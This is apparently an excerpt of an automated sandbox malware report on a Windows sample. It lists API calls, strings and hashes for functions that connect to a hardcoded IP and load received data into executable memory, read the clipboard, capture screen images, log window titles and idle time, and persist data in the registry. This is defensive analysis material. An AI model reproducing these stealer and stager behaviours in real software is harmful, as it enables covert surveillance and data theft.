CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02F0632C

Strings

end, xrefs: 02F0615E
45.201.245.153, xrefs: 02F061E5, 02F06229, 02F06283, 02F062F9

Memory Dump Source

Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd

Similarity

API ID: Sleep$CloseCreateEventExitOpenProcess__fassign
String ID: 45.201.245.153$end
API String ID: 64032600-4096021252
Opcode ID: 7b5a447d34762953caef9f750ab0437ee1b518a47c63e3f91f5eba24dea19317
Instruction ID: 7e146aa4f1d076b02e0e6f4be51e8f26001373f54840c983d8b22a8f07fd907a
Opcode Fuzzy Hash: 7b5a447d34762953caef9f750ab0437ee1b518a47c63e3f91f5eba24dea19317
Instruction Fuzzy Hash: 7661D471E8020AAFEB10EFA4CCC5E6DFB75AF48B94F910519E206A72C1CB709911DF91

Function 03D879E6 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 125stringregistryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 03D879FE
wsprintfW.USER32 ref: 03D87A66
RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?), ref: 03D87A8F
_memset.LIBCMT ref: 03D87AA6
RegQueryValueExW.KERNEL32(00000000,00000000,00000000,?,?,?), ref: 03D87AE2
lstrcatW.KERNEL32(03DC4360,?), ref: 03D87AFE
lstrcatW.KERNEL32(03DC4360,03DB5FCC), ref: 03D87B0A
RegCloseKey.ADVAPI32(00000000), ref: 03D87B13
lstrlenW.KERNEL32(03DC4360,?,90594F2A,00000000,00000AD4,75BF73E0), ref: 03D87B57
lstrcatW.KERNEL32(03DC4360,03DB6044,?,90594F2A,00000000,00000AD4,75BF73E0), ref: 03D87B6B

Strings

CLSID\{%.8X-%.4X-%.4X-%.2X%.2X-%.2X%.2X%.2X%.2X%.2X%.2X}, xrefs: 03D87A60

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: lstrcat$_memset$CloseOpenQueryValuelstrlenwsprintf
String ID: CLSID\{%.8X-%.4X-%.4X-%.2X%.2X-%.2X%.2X%.2X%.2X%.2X%.2X}
API String ID: 1671694837-4035668053
Opcode ID: 9c3d0003eeb90d4f0dc67955894e223220520a9eaf5b286744b9ce9f9de9db00
Instruction ID: cda586852243917faa81b164282dc1c6c8377f874a9b244664dc2d94c3ac12db
Opcode Fuzzy Hash: 9c3d0003eeb90d4f0dc67955894e223220520a9eaf5b286744b9ce9f9de9db00
Instruction Fuzzy Hash: 6241C8F1900268AFDB21DB95CC55FEEB3B8AF88704F0441C8F349A7181D674AA84CF64

Function 6C35BCA4 Relevance: 17.7, APIs: 2, Strings: 8, Instructions: 207COMMON

Download Yara Rule

APIs

_sprintf.LIBCMT ref: 6C35BDD5
_sprintf.LIBCMT ref: 6C35BDEE

Strings

Kaus Australis, xrefs: 6C35BDC0
,M31, xrefs: 6C35BDCC
,ze-1Ret, xrefs: 6C35BD84
,beCru, xrefs: 6C35BDA8
Pleione, xrefs: 6C35BD90
@, xrefs: 6C35BD48
Alnilam, xrefs: 6C35BD9C
Rigil Kentaurus, xrefs: 6C35BDB4

Memory Dump Source

Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true

Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd

Similarity

API ID: _sprintf
String ID: ,M31$,beCru$,ze-1Ret$@$Alnilam$Kaus Australis$Pleione$Rigil Kentaurus
API String ID: 1467051239-1042911856
Opcode ID: 1a2c5cd3aee1c56dad5d204c0a3117bf54ca61b5241e0f064adcda4e5d00204a
Instruction ID: 41f671232679176d1ee5a9d04847eec4123789933b60c22220a969ea9e84fc57
Opcode Fuzzy Hash: 1a2c5cd3aee1c56dad5d204c0a3117bf54ca61b5241e0f064adcda4e5d00204a
Instruction Fuzzy Hash: FE812031A0855ADACF10EF25D884DE87BB4FB4B30DF9245E9D0C95A854DB3282A8CF21

Function 03D87CC0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 116memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 03D858B0: InterlockedDecrement.KERNEL32(?), ref: 03D858FF
Part of subcall function 03D858B0: SysFreeString.OLEAUT32(00000000), ref: 03D85914
Part of subcall function 03D858B0: SysAllocString.OLEAUT32(03DB5B0C), ref: 03D85965

GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,?,?,03DB5B0C,?,03DB5B0C,00000000,00000000), ref: 03D87D24
GetLastError.KERNEL32 ref: 03D87D2E
GetProcessHeap.KERNEL32(00000008,?), ref: 03D87D46
HeapAlloc.KERNEL32(00000000), ref: 03D87D4D
GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,?,?), ref: 03D87D6F
LookupAccountSidW.ADVAPI32(00000000,?,?,00000100,?,00000100,?), ref: 03D87DA1
GetLastError.KERNEL32 ref: 03D87DAB
GetProcessHeap.KERNEL32(00000000,00000000), ref: 03D87E16
HeapFree.KERNEL32(00000000), ref: 03D87E1D

Strings

NONE_MAPPED, xrefs: 03D87DB8

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: Heap$AllocErrorFreeInformationLastProcessStringToken$AccountDecrementInterlockedLookup
String ID: NONE_MAPPED
API String ID: 1317816589-2950899194
Opcode ID: dfc76483d29be59806f388c6a098782ed3f5298ddc3b2666bf7211b79326c572
Instruction ID: 49db68ee5d534a868136b5c5a96a8f471eefd2f4eefaa1108cebf0fad0bd4302
Opcode Fuzzy Hash: dfc76483d29be59806f388c6a098782ed3f5298ddc3b2666bf7211b79326c572
Instruction Fuzzy Hash: C74156B7500209DBDB21EB60DD44FAEB77DEF84B00F144599F709A7240EA709E858F65

Function 03D86880 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 102registryclipboardstringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 03D868CD
lstrlenW.KERNEL32(?,74DEE010,74DF2FA0,74DF0F00), ref: 03D868DD

Part of subcall function 03D88270: _memset.LIBCMT ref: 03D882D9
Part of subcall function 03D88270: RegOpenKeyExW.KERNEL32(80000001,03DB5BF8,00000000,00020019,75BF73E0), ref: 03D882FC

lstrcmpW.KERNEL32(?,03DB5F60), ref: 03D86912
RegOpenKeyExW.ADVAPI32 ref: 03D86941
RegQueryValueExW.ADVAPI32(?,Regex,00000000,?,00000000,?), ref: 03D8696B
_memset.LIBCMT ref: 03D86987
RegQueryValueExW.ADVAPI32(?,Regex,00000000,?,00000000,?,?,?,?,?), ref: 03D869A5
std::locale::_Init.LIBCPMT ref: 03D86A64
std::_Lockit::_Lockit.LIBCPMT ref: 03D86A7C

Part of subcall function 03D8B290: std::_Lockit::_Lockit.LIBCPMT ref: 03D8B3DD

_memmove.LIBCMT ref: 03D86E87
_memmove.LIBCMT ref: 03D86F12
_memmove.LIBCMT ref: 03D86FFF
_memmove.LIBCMT ref: 03D870A3
GetDesktopWindow.USER32 ref: 03D87126
OpenClipboard.USER32(00000000), ref: 03D8712D
GetClipboardData.USER32(00000001), ref: 03D87135
GlobalSize.KERNEL32(00000000), ref: 03D87146
GlobalLock.KERNEL32(00000000), ref: 03D87152
GlobalUnlock.KERNEL32(?), ref: 03D87199
CloseClipboard.USER32 ref: 03D8719F
Sleep.KERNEL32(000003E8), ref: 03D8770D

Strings

Regex, xrefs: 03D86965, 03D8699F
2024. 9.12, xrefs: 03D8678D, 03D867B7
Uopen, xrefs: 03D868EB
key, xrefs: 03D86802, 03D868F0, 03D8692B
open, xrefs: 03D867FD

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: _memmove$ClipboardGlobalOpen_memset$LockitLockit::_QueryValuestd::_$CloseDataDesktopInitLockSizeSleepUnlockWindowlstrcmplstrlenstd::locale::_
String ID: 2024. 9.12$Regex$Uopen$key$open
API String ID: 90521431-542576200
Opcode ID: dc87ab613baf99fd6e6a69a835e47c06968a1c10f993a68ea1b151c9fdb861db
Instruction ID: 019f6d0539b8dc372f11f355b6a7b5a48de5ef3076b699665eb192e4085a040f
Opcode Fuzzy Hash: dc87ab613baf99fd6e6a69a835e47c06968a1c10f993a68ea1b151c9fdb861db
Instruction Fuzzy Hash: BC3196B2504344EFD210EB64EC85FABB3EDEB89754F004A1DF54587240EB74E904CBA2

Function 03D95120 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 150windowCOMMON

Download Yara Rule

APIs

GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 03D9514D
_malloc.LIBCMT ref: 03D95191
_free.LIBCMT ref: 03D951C3
GdipGetImageEncoders.GDIPLUS(?,?,00000008), ref: 03D951E2
GdipSaveImageToStream.GDIPLUS(00000000,?,?,00000000), ref: 03D95254
GdipDisposeImage.GDIPLUS(00000000), ref: 03D9525F
GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 03D95285
GdipDisposeImage.GDIPLUS(00000000), ref: 03D9529D

Strings

&, xrefs: 03D95239

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: Gdip$Image$DisposeEncoders$BitmapCreateFromSaveSizeStream_free_malloc
String ID: &
API String ID: 2794124522-3042966939
Opcode ID: a51202fe41924b040e2db21958694ae76522644ffe27d29b4eefc631155b0f79
Instruction ID: 39171db36c7ad961b7548e126143d5f306ac85b04147836c8fea9fe9053750de
Opcode Fuzzy Hash: a51202fe41924b040e2db21958694ae76522644ffe27d29b4eefc631155b0f79
Instruction Fuzzy Hash: BA515276D00219AFEF05DFA4D8449EEB7B9EF49710F04452AE905BB350E734A905CBB0

Function 02F052A0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 123registrysleepCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000002,SOFTWARE,00000000,00000102,?), ref: 02F05372
RegDeleteValueW.KERNEL32(?,IpDates_info), ref: 02F05382
RegSetValueExW.KERNEL32(?,IpDates_info,00000000,00000003,02F1C6E0,000012A0), ref: 02F053A0
RegCloseKey.KERNEL32(?), ref: 02F053AB
OpenProcess.KERNEL32(00000400,00000000,?), ref: 02F053FF
GetExitCodeProcess.KERNEL32(00000000,?), ref: 02F0540B
Sleep.KERNEL32(00000BB8), ref: 02F05424

Strings

IpDates_info, xrefs: 02F0537C, 02F0539A
SOFTWARE, xrefs: 02F05368

Memory Dump Source

Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd

Similarity

API ID: OpenProcessValue$CloseCodeDeleteExitSleep
String ID: IpDates_info$SOFTWARE
API String ID: 864241144-2243437601
Opcode ID: c267284f795d32e8543a6c5636ebc6bed8fab1d438b8120cefa7750ee57035f4
Instruction ID: f9d3751d8de3719e67f04703722c739c8e831dfba7d5abdf30a062ec8ecaafe3
Opcode Fuzzy Hash: c267284f795d32e8543a6c5636ebc6bed8fab1d438b8120cefa7750ee57035f4
Instruction Fuzzy Hash: 10412A32A842459FD3109B309C89B7ABBA6BB447C4FD90448E789D61C2D3F0D401DF62

Function 02F052C9 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 84registrysleepCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000002,SOFTWARE,00000000,00000102,?), ref: 02F05372
RegDeleteValueW.KERNEL32(?,IpDates_info), ref: 02F05382
RegSetValueExW.KERNEL32(?,IpDates_info,00000000,00000003,02F1C6E0,000012A0), ref: 02F053A0
RegCloseKey.KERNEL32(?), ref: 02F053AB
OpenProcess.KERNEL32(00000400,00000000,?), ref: 02F053FF
GetExitCodeProcess.KERNEL32(00000000,?), ref: 02F0540B
Sleep.KERNEL32(00000BB8), ref: 02F05424

Strings

IpDates_info, xrefs: 02F0537C, 02F0539A
SOFTWARE, xrefs: 02F05368

Memory Dump Source

Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true

Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd

Similarity

API ID: OpenProcessValue$CloseCodeDeleteExitSleep
String ID: IpDates_info$SOFTWARE
API String ID: 864241144-2243437601
Opcode ID: 8ba160c13f798ac5b1aefc714b07c42d159bb153c95aaca8b3bd6a146fa81435
Instruction ID: 50cd578ddc131f81439ef9a883225123971c0af0de4ec8543f49bf66151df5b0
Opcode Fuzzy Hash: 8ba160c13f798ac5b1aefc714b07c42d159bb153c95aaca8b3bd6a146fa81435
Instruction Fuzzy Hash: E931A530A883459FD721DB708899B79BBE6BB447C4FD90848E3899A2C2C3F0D505DB61

Function 03D97740 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 197registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000001,Console\0,00000000,000F003F,03DB0F38,90594F2A,00000001,00000000,00000000), ref: 03D97781
RegQueryInfoKeyW.ADVAPI32(03DB0F38,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 03D977B0
_memset.LIBCMT ref: 03D97814
_memset.LIBCMT ref: 03D97823
RegEnumValueW.KERNEL32(03DB0F38,?,00000000,?,00000000,?,00000000,?), ref: 03D97842

Part of subcall function 03D9ABD2: _malloc.LIBCMT ref: 03D9ABEC

Part of subcall function 03D9ABD2: std::exception::exception.LIBCMT ref: 03D9AC21
Part of subcall function 03D9ABD2: std::exception::exception.LIBCMT ref: 03D9AC3B
Part of subcall function 03D9ABD2: __CxxThrowException@8.LIBCMT ref: 03D9AC4C

_memmove.LIBCMT ref: 03D978C5
RegCloseKey.KERNEL32(03DB0F38,?,?,?,?,?,?,?,?,?,?,?,00000000,03DB0F38,000000FF), ref: 03D97953

Strings

Console\0, xrefs: 03D97774

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: _memsetstd::exception::exception$CloseEnumException@8InfoOpenQueryThrowValue_malloc_memmove
String ID: Console\0
API String ID: 1346252173-1253790388
Opcode ID: 025d8a8c21041c1ff3b9caa4b069fdddca588da998496ba9a2f2b648d3969edc
Instruction ID: 8f6dbd73538d04f5cd0f9ac3ffc170adc5fb91d12429fd86c58a32fb215b240f
Opcode Fuzzy Hash: 025d8a8c21041c1ff3b9caa4b069fdddca588da998496ba9a2f2b648d3969edc
Instruction Fuzzy Hash: 45611CB6E00219EFDB04DFA8D880AEEB7B9FF49310F14466AE915A7345D7349901CBA0

Function 02EB08F2 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 157networkmemoryCOMMON

Download Yara Rule

APIs

socket.WS2_32(00000002,00000001,00000006,00000000,00000000,?,?,02EB08C6,00000001), ref: 02EB0908
VirtualAlloc.KERNEL32(00000000,0008000E,00003000,00000040,?,?,02EB08C6,00000001), ref: 02EB0924
connect.WS2_32(?,?,00000010), ref: 02EB0981
send.WS2_32(?,00000001,00000004,00000000), ref: 02EB099F
VirtualAlloc.KERNEL32(00000000,0004D800,00003000,00000004), ref: 02EB09B9
recv.WS2_32(?,00000001,00019000,00000000), ref: 02EB09D4
VirtualFree.KERNELBASE(00000001,00000000,00008000), ref: 02EB09FF

Strings

x32, xrefs: 02EB0998

Memory Dump Source

Source File: 00000006.00000002.3621984576.0000000002EB0000.00000040.00000020.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2eb0000_Fj0RhXL.jbxd

Similarity

API ID: Virtual$Alloc$Freeconnectrecvsendsocket
String ID: x32
API String ID: 799107390-2569000010
Opcode ID: 1764fd0751977d3884cf36413de808e311c9a7fd129ce8604c1fb90a25c6e9b1
Instruction ID: 5c2d42ab39c5c658d0fd2172ba757d7899e3eaab47de82dd24d6abbc229fb16c
Opcode Fuzzy Hash: 1764fd0751977d3884cf36413de808e311c9a7fd129ce8604c1fb90a25c6e9b1
Instruction Fuzzy Hash: DA51CC70940204EBCF26DF68C888BAF7BB9FF85718F149580F914AB196D770EA40CB90

Function 03D967D0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 126COMMON

Download Yara Rule

APIs

Part of subcall function 03D9ABD2: _malloc.LIBCMT ref: 03D9ABEC

_memset.LIBCMT ref: 03D967F1
GetLastInputInfo.USER32(?), ref: 03D96807
GetTickCount.KERNEL32 ref: 03D9680D
wsprintfW.USER32 ref: 03D96836
GetForegroundWindow.USER32 ref: 03D9683F
GetWindowTextW.USER32(00000000,00000020,000000FA), ref: 03D96853
_memmove.LIBCMT ref: 03D968CD

Strings

%d min, xrefs: 03D96830

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: Window$CountForegroundInfoInputLastTextTick_malloc_memmove_memsetwsprintf
String ID: %d min
API String ID: 2941202404-1947832151
Opcode ID: da741cae7f1aa0bcecf4070f52b38ee46dc6a86c8620c27b36b62703cfc917a0
Instruction ID: ff820a81011bdac66d4fdee4c514fbed9885feee052cf3e596357e57a867be2b
Opcode Fuzzy Hash: da741cae7f1aa0bcecf4070f52b38ee46dc6a86c8620c27b36b62703cfc917a0
Instruction Fuzzy Hash: 054180B6D00214EFDB14DFA4C889A9EBBB9EF44710F088569E9099B345E674DA04CBE1

Function 03D87E40 Relevance: 13.6, APIs: 9, Instructions: 109COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(90594F2A,00000000,00000000,75BF73E0,03DB0AC0,000000FF,?,03D87FB3,00000000), ref: 03D87E68
OpenProcess.KERNEL32(00000400,00000000,00000000,?,03D87FB3,00000000), ref: 03D87E77
OpenProcessToken.ADVAPI32(00000000,00000008,?,?,03D87FB3,00000000), ref: 03D87E8D
CloseHandle.KERNEL32(00000000,?,03D87FB3,00000000), ref: 03D87E98
SysStringLen.OLEAUT32(00000000), ref: 03D87EEB
SysStringLen.OLEAUT32(00000000), ref: 03D87EF9
_memmove.LIBCMT ref: 03D87F18
CloseHandle.KERNEL32(?), ref: 03D87F2A
CloseHandle.KERNEL32(00000000), ref: 03D87F2D

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: CloseHandleProcess$OpenString$CurrentToken_memmove
String ID:
API String ID: 1122806710-0
Opcode ID: 924bc27719fc10d729f5732c5a16d7a02b344af6b41dcf41b631875d983b7225
Instruction ID: 20f5acf7a5f2dd822cffad4e9cb8d0f8c78b09b7cf6cda42ec1436efeaec53f0
Opcode Fuzzy Hash: 924bc27719fc10d729f5732c5a16d7a02b344af6b41dcf41b631875d983b7225
Instruction Fuzzy Hash: F73173B3D04209EBDB11EFA5DC44AAFB7B9EF84710F65091AE915E7340DB75A900CBA0

Function 6C374AFA Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 91COMMON

Download Yara Rule

APIs

_fgetc.LIBCMT ref: 6C374B43
_sprintf.LIBCMT ref: 6C374B6F

Part of subcall function 6C3747B5: _sprintf.LIBCMT ref: 6C3747FA
Part of subcall function 6C3747B5: _sprintf.LIBCMT ref: 6C374846
Part of subcall function 6C3747B5: GetModuleFileNameA.KERNEL32(?,000000FF,?,?,?,00000000,00000000), ref: 6C374860
Part of subcall function 6C3747B5: _sprintf.LIBCMT ref: 6C3748A1
Part of subcall function 6C3747B5: _sprintf.LIBCMT ref: 6C3748D5
Part of subcall function 6C3747B5: _sprintf.LIBCMT ref: 6C37491C

_fgetc.LIBCMT ref: 6C374B90
_fgetc.LIBCMT ref: 6C374BC9

Strings

, xrefs: 6C374B98
The command file '%s' is not in any valid format (character %d)., xrefs: 6C374B69
@, xrefs: 6C374B57

Memory Dump Source

Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true

Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd

Similarity

API ID: _sprintf$_fgetc$FileModuleName
String ID: $@$The command file '%s' is not in any valid format (character %d).
API String ID: 1310815430-447543786
Opcode ID: 3f664455309f5cf085848be3d7e2369e85f6efcc0fe0c3882874766eae7a1051
Instruction ID: e28a913d9a62550b453577fa31a2b0c49d96a8b6a098e40977b1dea3164ab705
Opcode Fuzzy Hash: 3f664455309f5cf085848be3d7e2369e85f6efcc0fe0c3882874766eae7a1051
Instruction Fuzzy Hash: 7221ECB29451245AD7319A199C40FDE77BC9F8221CF110199F6C8B3B40DB3D6E8A8E7E

Function 6C3983BC Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 174COMMON

Download Yara Rule

APIs

_sprintf.LIBCMT ref: 6C39858D
_sprintf.LIBCMT ref: 6C3985DE

Strings

SwissEph file '%s' not found in PATH '%s', xrefs: 6C398587
error: file path and name must be shorter than %d., xrefs: 6C3985D3
.;C:\Astrolog\, xrefs: 6C3983DE
\, xrefs: 6C3984A8

Memory Dump Source

Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true

Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd

Similarity

API ID: _sprintf
String ID: .;C:\Astrolog\$SwissEph file '%s' not found in PATH '%s'$\$error: file path and name must be shorter than %d.
API String ID: 1467051239-2281980244
Opcode ID: 9b3cfc0eaa4174e59983b200ab16bddd355d0e7e802f9ef65e7639e96e8dba28
Instruction ID: ab22dd41b4d5b04b275ce88bdf182b2a5b0e3b70067b0712f1315da1bf43b814
Opcode Fuzzy Hash: 9b3cfc0eaa4174e59983b200ab16bddd355d0e7e802f9ef65e7639e96e8dba28
Instruction Fuzzy Hash: 1151E6B0A0416D8FDB11DE28CD54AD9BBF5AF85308F0485FAD288E7602F6315ACD8F56

Function 03D88270 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 89registrystringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 03D882D9
RegOpenKeyExW.KERNEL32(80000001,03DB5BF8,00000000,00020019,75BF73E0), ref: 03D882FC
RegQueryValueExW.KERNEL32(75BF73E0,GROUP,00000000,00000001,?,00000208), ref: 03D8834A
lstrcmpW.KERNEL32(?,03DB5B0C), ref: 03D88360
lstrcpyW.KERNEL32(03D85E98,?), ref: 03D88372

Strings

GROUP, xrefs: 03D88342

Memory Dump Source

Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true

Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd

Yara matches

Similarity

API ID: OpenQueryValue_memsetlstrcmplstrcpy
String ID: GROUP
API String ID: 2102619503-2593425013
Opcode ID: f4f751badb2207bccc9ba69ab4153eedf7089d902e7ce5ba49d8d4b1e1b785c8
Instruction ID: 3cada94f9b7d637024db933ddd30a1a0fd53ec0a91615222232a70b5c747594e
Opcode Fuzzy Hash: f4f751badb2207bccc9ba69ab4153eedf7089d902e7ce5ba49d8d4b1e1b785c8
Instruction Fuzzy Hash: F9316771900318EBDB20DF95DC89B9EB7B8FB48710F544699E519E7280DB74AA44CF50

